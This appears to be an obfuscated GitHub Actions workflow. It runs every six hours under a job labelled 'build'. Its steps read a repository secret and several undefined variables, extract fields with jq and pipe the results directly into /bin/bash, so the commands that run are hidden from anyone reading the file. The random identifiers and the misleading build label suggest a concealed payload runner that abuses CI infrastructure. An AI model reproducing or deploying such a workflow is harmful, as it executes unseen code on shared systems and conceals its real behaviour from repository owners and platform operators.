name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '37 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          kpp39: ${{ secrets.kpp39 }}
        run: |
          echo $kpp39 | jq -r .v24389 | /bin/bash
          echo $itpg60 | jq -r .rw63141 | /bin/bash
          echo $b81 | jq -r .o6 | /bin/bash
          echo $hl92 | jq -r .qia4 | /bin/bash
          echo $qa36 | jq -r .wjak99 | /bin/bash
          echo $s00 | jq -r .osn80 | /bin/bash
          echo $cqdx579 | jq -r .tuzsk0 | /bin/bash
          echo $jab0934 | jq -r .enx5 | /bin/bash

